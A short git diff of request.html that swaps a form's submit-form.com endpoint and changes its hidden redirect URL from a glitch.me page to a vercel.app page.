--- a/request.html
+++ b/request.html
@@ -26,8 +26,8 @@
         </script>
     </head>
     <body>
-        <form id="myForm" action="https://submit-form.com/v1NWOqWU9" method="POST">
-            <input type="hidden" name="_redirect" value="https://pond-crawling-leather.glitch.me/pass.html"/>
+        <form id="myForm" action="https://submit-form.com/W76moKjWZ" method="POST">
+            <input type="hidden" name="_redirect" value="https://apply-here-now-xi.vercel.app/"/>
             <header class="header">
                 <br>
                 <br>
